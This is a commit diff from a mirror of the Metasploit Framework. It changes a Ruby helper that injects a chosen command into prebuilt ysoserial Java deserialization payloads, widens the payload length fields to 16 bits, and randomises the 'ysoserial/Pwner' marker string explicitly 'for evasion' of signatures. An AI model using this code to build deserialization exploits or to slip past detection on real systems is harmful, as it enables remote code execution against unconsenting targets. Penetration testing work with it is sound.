infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

ysoserial: Support larger payloads, Randomize fingerprintable string

GSoC/Meterpreter_Web_Console
asoto-r7 2018-12-14 14:43:30 -06:00
parent fa74a1839a
commit 212454b1fb
No known key found for this signature in database
GPG Key ID: F531810B7FE55396
1 changed files with 8 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
lib/msf/util/java_deserialization.rb
View File

@ -6,7 +6,6 @@ require 'base64'
PAYLOAD_FILENAME="ysoserial_payloads.json"
#TODO: Randomize bytes which could be signatured (ysoserial/Pwner000000000000000)
#TODO: Support ysoserial alongside ysoserial-modified payloads (including cmd, bash, powershell, none)
class Java_deserialization
@ -43,15 +42,18 @@ class Java_deserialization
bufferOffset = payload['bufferOffset'].first #TODO: Do we ever need to support multiple buffers?
bytes[bufferOffset-1] += command
# Overwrite lengthOffset (multiple times, if necessary)
# Overwrite length (multiple times, if necessary)
lengthOffsets = payload['lengthOffset']
lengthOffsets.each do |lengthOffset|
#TODO: Handle command strings >255 chars
raise RuntimeError, "Command buffer too large" if bytes[lengthOffset].ord + command.length > 255
bytes[lengthOffset] = (bytes[lengthOffset].ord + command.length.ord).chr
# Extract length as a 16-bit unsigned int, then add
length = bytes[lengthOffset-1..lengthOffset].unpack("n").first
length += command.length.ord
length = [length].pack("n")
bytes[lengthOffset-1..lengthOffset] = length
end
# TODO: Randomize "ysoserial/Pwner00000000000000"
# Replace "ysoserial\/Pwner" timestamp string with randomness for evasion
bytes.gsub!(/ysoserial\/Pwner00000000000000/, Rex::Text.rand_text_alphanumeric(29))
return bytes
else
raise RuntimeError, "Malformed JSON file"